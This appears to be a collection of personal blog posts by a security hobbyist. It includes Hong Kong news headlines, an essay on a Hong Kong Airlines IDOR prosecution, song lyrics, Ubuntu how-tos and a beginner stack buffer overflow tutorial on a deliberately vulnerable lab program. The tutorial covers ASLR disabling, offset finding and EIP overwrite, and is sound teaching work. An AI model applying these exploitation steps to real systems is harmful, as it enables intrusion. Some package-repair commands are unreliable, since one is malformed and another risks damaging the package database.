香港黑白衣人事件

總編輯時間–香港黑白衣人事件





07242019時事觀察 第1節：霍詠強 -- 還原全景、真相自明

Longjing

Longjing is deep learning driven web application firewall based on Scikit-Learn library. The following is the slide in PDF format.

sha256sum 116c66c8cb18b0cb280df0fc52425b250b17e231975f6dce50cc04fbcbbb5612 presentation-longjing.pdf

Download : presentation-longjing.pdf

That's all! See you.

Croissants

Croissants is one of my open source projects since 2012. The following is the slide in PDF format.


sha256sum 814e353abfa899aede7c6173a3dfd78b9aab0242258748f1e35073a87ff13f47 presentation-croissants.pdf

Download : presentation-croissants.pdf


That's all! See you.

Mission Impossible?

This site is scaled down Damn Vulnerable Web Application (DVWA) which is designed for Penetration Testing purpose. It is full of vulnerabilities, such as SQL Injection (SQLi) and Cross Site Scripting (XSS). However, it is under my protection scheme and it is considered secured. You are allowed to attack it in any form except DDoS and/or Dos. Any one can hack or bypass it, please let me know and contact Samiux at freenode #infosec-ninjas.

Target : Infosec Projects.
Rule : You are allowed to attack it in any form except DDoS/DoS.
Remarks : Online time is limited.
Contact : Samiux at freenode #infosec-ninjas

That's all! See you.

Miley Cyrus - The Backyard Sessions - "Jolene"

"Jolene"
(originally by Dolly Parton)

Jolene, Jolene, Jolene, Jolene
Oh, I'm begging of you please don't take my man
Jolene, Jolene, Jolene, Jolene
Please don't take him even though you can

Your beauty is beyond compare
With flaming locks of auburn hair
With ivory skin and eyes of emerald green

Your smile is like a breath of spring
Your skin is soft like summer rain
And I can not compete with you, Jolene

And I could easily understand
How you could easily take my man
But you don't know what he means to me, Jolene

He talks about you in his sleep
There's nothing I can do to keep
From crying, when he calls your name, Jolene, Jolene

Jolene, Jolene, Jolene, Jolene
Please don't take him even though you can
Jolene, Jolene, Jolene, Jolene
Please don't take him even though you can

I had to have this talk with you
My happiness depends on you
And whatever you decide to do, Jolene

And you could have your choice of men
But I could never love again
Cause he's the only one for me, Jolene, Jolene

Jolene, Jolene, Jolene, Jolene
Oh, I'm begging of you please don't take my man
Jolene, Jolene, Jolene, Jolene
Please don't take him even though you can
Jolene, Jolene...

中国天网系统有多强？

烏合之眾

挑战不可能

18 年带出 2000 余名狙击手 高级狙击技师百步穿杨



天眼狙击手还原高难度场景 神枪手在线演绎军事大片



“猎鹰突击队” 女特警展神技



95 后 “女枪神” 郭子睿和教官李知雨合作击落动态目标 刷新个人纪录



两位女狙击手巅峰对决 现场气氛剑拔弩张



十年坦克兵挑战 270 度坦克漂移 燃爆全场



特战队员 1.70 秒 5 发子弹全部命中目标 终极挑战中角逐“极速枪王”

白帽子乎？!

二零一八年十月廿九日，廿七歲的陳子恩發現香港航空公司 (Hong Kong Airlines) 登機證的網址有敏感資料外洩 (學名為 Insecure Direct Object Reference，IDOR) 漏洞，可以任意讀取其他客戶的資料。他辯稱曾聯絡香港航空公司報告有關其漏洞，但未獲正視，所以向傳媒披露。

同日，傳媒隨即向該公司查詢，該公司職員發現陳某曾經在未獲授權的情況下讀取其中一個客戶的資料。 該公司立即報案。經調查後，陳某被控以「電訊條例」的有關罪行。

他在庭上辯護說他發現漏洞，但未被正視，如果這情況在外國，或者是白帽子的話，他就會得到獎賞，但是他卻被檢控有關罪行，覺得不公平和「司法滋擾」。 最後，陳某在二零一九年七月三日被判有罪，准以自簽一千五百港元，守行為一年了事。

現在分析和研究一下陳某是否犯法和其辯護的理由是否合理。

首先白帽子是指「道德黑客」其在書面授權的情況下進行滲透測試 (Penetrating Testing)。若果所謂的白帽子，並不在書面授權之下進行滲透測試，他就是犯法，顧名思義就是黑帽子。 至於獎賞，如果目標的公司或機構是舉行或參與獎賞計劃 (Bug Bounty) 的話，所有參與滲透測試的人員都是在書面授權的情況下操作，如果白帽子有所發現，他們就得到其應有的獎賞。

所以重點就是否在書面授權的情況下進行滲透測試。以這個案例來說，陳某並非在書面授權的情況下進行滲透測試，所以他是觸犯法例的，這情況亦包括外國的其他國家。

最後，我個人認為，陳某是輕判了！請各位不要以身試法。 所謂獎賞是非必然的。

Samiux
OSCE OSCP OSWP
二零一九年七月四日，中國香港

參考資料

東網新聞

頭條新聞

維基百科

HOWTO : Upgrade Ubuntu 18.04.x LTS to 19.04 Directly

Upgrade Ubuntu 18.04.x LTS to 19.04 directly without via 18.10. Make sure do not upgrade it via SSH.

sudo sed -i 's/Prompt\=lts/Prompt=normal/g' /etc/update-manager/release-upgrades
sudo sed -i 's/bionic/disco/g' /etc/apt/sources.list
sudo sed -i 's/bionic/disco/g' /etc/apt/sources.list.d/*.list
sudo sed -i 's/18\.04/19.04/g' /etc/apt/sources.list.d/*.list
sudo apt update
sudo apt upgrade
sudo apt dist-upgrade
sudo apt autoclean
sudo apt autoremove

That's all! See you.

香港逃犯條例修訂解釋

Recon Me If You Can (2019)!

Reconnaissance (Recon) is the most important phase in hacking. If you have insufficient information of the target, you cannot launch any attack on it.

Does your Intrusion Detection and Prevention System (IDPS), Firewall, Unified Threat Management System (UTM) and etc can achieve reconnaissance evasion?



That's all! See you.

HOWTO : Solve libssl1.1 Installation Problem On Ubuntu 18.04.2 LTS

Since the current version of libssl1.1 is 1.1.1 on Ubuntu 18.04.2, the previous installed 1.1.0 may caused problem when you are upgrading or updating the system. You need to do the following to solve the problem.

ls -l /var/lib/dpkg/info | grep -i libssl

When you see both 1.1.0 and 1.1.1, you need to do the following :

sudo mv /var/lib/dpkg/info/libssl* /tmp

sudo apt-get update
sudo apt-get -y dist-upgrade
sudo apt-get -y autoclean
sudo apt-get -y autoremove

The problem should be solved.

That's all! See you.


UPDATE
Since Ubuntu has fixed the problem recently, you need to do the following to fix the missing libssl1.1.0.

sudo apt-get --reinstall -y libssl1.1.0

HOWTO : Install Keras On Nvidia Jetson Nano Developer Kit

To install JetPack 4.2 on Nvidia Jetson Nano Developer Kit, you need to follow this link.

Since JetPack 4.2 is using Ubuntu 18.04 instead of Ubuntu 18.04.2, Unity is installed by default. I prefer to uninstall Unity and get back the GNOME 3.

sudo apt update
sudo apt -y dist-upgrade
sudo apt remove unity-session unity
sudo apt install -y ubuntu-session gdm3 firefox gparted chrome-gnome-shell gnome-tweak-tool nano
sudo apt -y autoclean
sudo apt -y autoremove

Reboot the box.

If you have ownCloud :

sudo apt install -y owncloud-client

** owncloud requires you to enter password every time when boot.

To install Gnome Shell Extensions :

Harddisk LED to display the activity of the hard drive/SSD. It is recommended for this developer kit.

To set "Problem Reporting" to "Automatic" at "Privacy" of "Settings" in order to prevent unexpected popup windows.

To install Keras :

sudo apt-get install libhdf5-serial-dev hdf5-tools
sudo apt install -y python3-pip python3-dev python3-scipy
sudo apt-get install zlib1g-dev zip libjpeg8-dev libhdf5-dev

sudo pip3 install -U pip
sudo pip3 install -U numpy grpcio absl-py py-cpuinfo psutil portpicker six mock requests gast h5py astor termcolor

sudo pip3 install --extra-index-url https://developer.download.nvidia.com/compute/redist/jp/v42 tensorflow-gpu

sudo pip3 install -U keras

To test if it works or not :

python3

>>> import keras

If there is no error message and showing "Using TensorFlow backend.", it works. To quit it :

>>> quit()

If you want to create swap file, you may need to use this resources.

That's all! See you.

轉念反思 - 楊和生 (Sang Young)

凡事總有兩面。網絡世界有利用網絡犯罪的｢黑帽黑客｣，亦有保衛網絡的｢白帽黑客｣，兩者同時懂得黑客技術。但原來最大的技術不是技術層面上，而是捉摸人性心態。盲目瘋傳訊息往往助長黑客的氣焰，只要抱持懷疑態度，敢於質詢，不用特別技術，我們都可以終止一切謠言。

HOWTO : Exploit Education - Phoenix on Kali Linux Rolling

apt install qemu-system

wget https://github.com/ExploitEducation/Phoenix/releases/download/v1.0.0-alpha-3/exploit-education-phoenix-amd64-v1.0.0-alpha-3.tar.xz

tar -xJvf exploit-education-phoenix-amd64-v1.0.0-alpha-3.tar.xz

cd exploit-education-phoenix-amd64

chmod +x boot-exploit-education-phoenix-amd64.sh

To run the virtual machine :

./boot-exploit-education-phoenix-amd64.sh

Open another terminal :

ssh -p 2222 user@localhost

The password is "user".

Inside the virtual machine, go to :

cd /opt/phoenix

You can choose either "amd64" or "i486" to do the Phoenix exploits.

cd /opt/phoenix/amd64

or

cd /opt/phoenix/i486

That's all! See you.

Basic Buffer Overflow Exploit Make Easy

According to Wiki, a buffer overflow, or buffer overrun, is an anomaly where a program, while writing data to a buffer, overruns the buffer's boundary and overwrites adjacent memory locations.

When buffer overflow occurs, attacker can run malicious code accordingly and may escalate the privilege as a result.

I introduce a very simple way to develop the buffer overflow exploit. No complicated procedure can be observed. The exploit development is running on 64-bit Kali Linux.

The following is the C source code of the "vuln.c" :



The "hacker" function is never be called from the program. Our aim is to run it as a result.

To compile the source to an executable :

gcc vuln.c -o vuln -fno-stack-protector -m32

If you cannot compiile to 32-bit, please install the following package :

apt install gcc-multilib

To make it simple, we disable the Address Space Layout Randomization (ASLR) :

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

In order to inspect the executable file, we need to download a tool namely "checksec.sh".

wget https://www.trapkit.de/tools/checksec.sh

Since the file is in Windows DOS format, we need to change it to be Unix format and executable :

dos2unix checksec.sh
chmod +x checksec.sh

Run the following command and you will find out that "NX" is enabled.

./checksec.sh --file vuln



To double check the file is compiled into 32-bit.

file vuln

vuln: ELF 32-bit LSB pie executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=bc2907521e9842167e7544516653843949dabc9e, not stripped

When everything is alright, we run it to see how it works.

./vuln

What is your name?
samiux
Hey samiux, you're harmless, aren't you?

To see if we can crash it or not with 50 characters :

python -c 'print("A"*50)' > a.txt

cat a.txt | ./vuln

What is your name?
Hey AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA, you're harmless, aren't you?
Segmentation fault

Okay, it does crash. Now, we fire up the gdb to do the exploit development :

gdb ./vuln



Feed in the junk characters.

(gdb) r < a.txt



The program is crashed as expected.

We check with the registers to see what had happened.

(gdb) info registers



We noticed that the EIP is overwritten with "A". That means, we can control the EIP then. Once EIP can be controlled, we can run any code from that point. It is because EIP Instruction Pointer Register always contains the address of the next instruction to be executed.

Now, we need to find out how many junk characters to cause the crash. We use the "pattern_create.rb" to create a unique pattern.

Open another terminal and run :

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 50 > b.txt

We feed the unique pattern to the program.

(gdb) r < b.txt



The program is crashed again as expected.

We check the registers again and found out that EIP is overwritten with "0x41346241".

(gdb) info registers



We use the tool namely "pattern_offset.rb" to find out the offset. The offset is 42 for this case.

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 41346241
[*] Exact match at offset 42

According to the source code, we know that there are 3 functions, they are main, inSecure and hacker. Our aim here is to run hidden function "hacker". So, we need to find out the address of the function of hacker.

(gdb) info functions



(gdb) disass hacker



We find out that the address of function hacker is "0x565561b9".

Now, the payload will be as the following :

42's "A" and [the address of hacker function]

The PoC Python code "poc.py" :



Exploit it now :

python poc.py | ./vuln

What is your name?
Hey AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�aUV, you're harmless, aren't you?
No, I'm a hacker!
Segmentation fault

The hidden hacker function is ran as a result.


Bonus

To find the EIP address :

python -c 'print("A"*42)+ "B"*4' > c.txt

(gdb) r < c.txt



(gdb) info registers



(gdb) x/50xw $esp -100



The EIP address is 0xffffd32c.


Samiux
OSCE OSCP OSWP
May 9, 2019, Hong Kong, China

Exploit Education - Phoenix (Stack Overflows)

Exploit Education is formerly Exploit Exercise. They have a series of exploit exercises. The new release is Phoenix which covers the following topics :

- Network programming
- Stack overflows
- Format string vulnerabilities
- Heap overflows

I do the Stack overflows (i486) section recently. However, I cannot solve Stack-Six as it is too difficult for me at the moment.

You can download the virtual machine at here. The current image is v1.0.0-alpha-3 and released on 16th January 2019.

For not being a spoiler, the exploit codes are not shown in the video.



That's all! See you.

VulnHub - Stack Overflows for Beginners 1

Stack Overflows for Beginners 1 is created by Jack Barradell-Johns who is a university student of University of Sheffield. He developed this box for Ethical Hacking Society of the university.

There are 5 flags (including root flag) to capture that are based on basic stack buffer overflow. The box is built on Kali Linux and is about 8 GB to download.

The first level is level0 and the username and password are both "level0".


To avoid for being spoiler, the flags and exploit codes are not shown in the video.




Samiux
OSCE OSCP OSWP
May 2, 2019 Hong Kong, China

HUAWEI MateBook X Pro on Ubuntu Desktop 18.04.2 LTS

CPU - Intel Core i7-8550U
RAM - 16GB LPDDR3
SSD - 512GB NVMe PCIe SSD
Thunderbolt 3 - USB Type C
Display - 13.9 inches LTPS Touchscreen (3,000 x 2,000) (260 PPI)
Graphic - nVidia M150 and Intel HD Graphic on CPU
F2 key - UEFI BIOS
F12 key - Boot list

This is 2018 model. The 2019 (HUAWEI MateBook X Pro New) is not available here at the moment.

If you want to, you need to update BIOS on Windows 10 environment before installing Ubuntu. To update it, just download the driver and install the ".INF".

You can install Ubuntu Desktop 18.04.2 LTS on HUAWEI MateBook X Pro without any problem no matter "Secure Boot" is enable or not. However, it cannot be shutdown or reboot properly unless you installed nVidia display driver on it.

Make sure the "Problem Reporting" is set to "Automatic" at "Privacy" of "Settings" under the top right hand conner.

Meanwhile, you may need to install "net-tools" for seeing the settings of the network interfaces.

sudo apt install net-tools

nVidia Display Driver

You can install the latest nVidia Open Source Display Driver version 418 on it via Ubuntu PPA. VirtualBox 6.0.6 guest VM requires newer version of nVidia display driver. I tested it with version 319 but the guest vm cannot be refreshed properly near the mouse pointer.

sudo add-apt-repository ppa:graphics-drivers/ppa
sudo apt-get update

(if you have older version of nVidia driver, delete it first)
sudo apt purge nvidia*

sudo apt install nvidia-driver-418 nvidia-settings

GNOME Extensions

GNOME Extensions are very useful. I recommend you to install the following for this laptop.

sudo apt chrome-gnome-shell gnome-tweak

Go to the "https://extensions.gnome.org/" to install extensions by clicking the "ON/OFF" button on the Extensions pages.

EasyScreenCast to record the screen in video format.

OpenWeather to see the current weather of your location.

CPUfreq to change the CPU between "powersave" or "performance" as well as "Turbo Boost".

VirtualBox Applet for easy access the VirtualBox virtual machines when VirtualBox is installed.

Extension Update Notifier to notifiy you about the update of Extensions.

Caffeine to disable and enable the screen saver.

Clipboard Indicator to manage your copy and paste clipboard data.

Lock Keys to indicate the "Nums" and "CapLock" keys status.

Harddisk LED to display the activity of the hard drive/SSD.

That's all! See you.